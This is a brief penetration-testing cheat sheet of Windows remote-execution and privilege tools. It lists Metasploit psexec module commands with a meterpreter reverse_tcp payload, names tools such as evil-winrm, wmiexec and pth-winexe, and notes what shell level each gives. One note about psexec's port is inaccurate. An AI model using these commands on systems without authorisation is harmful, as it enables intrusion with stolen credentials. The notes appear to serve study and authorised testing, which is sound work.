privesc tools
check if win-logon-creds are working
msf
use exploit/windows/smb/psexec
set PAYLOAD windows/x64/meterpreter/reverse_tcp
SHOW TARGETS
>set TARGET X
use exploit/windows/smb/psexec_psh
Note: psexec & evil-winrm uses port 5985
(powershell remote access)
psexec | smbexec | wmiexec
NOTE: psexec, smbexec will give SYSTEM shell. wmiexec will give user shell.
evil-winrm
NOTE: evil-winrm usually gives medium integrity shells for added administrator accounts. Even if new account has Administrator permissions, cannot actually perform administrative actions with it.
winexe
pth-winexe
PsExec.exe
Last updated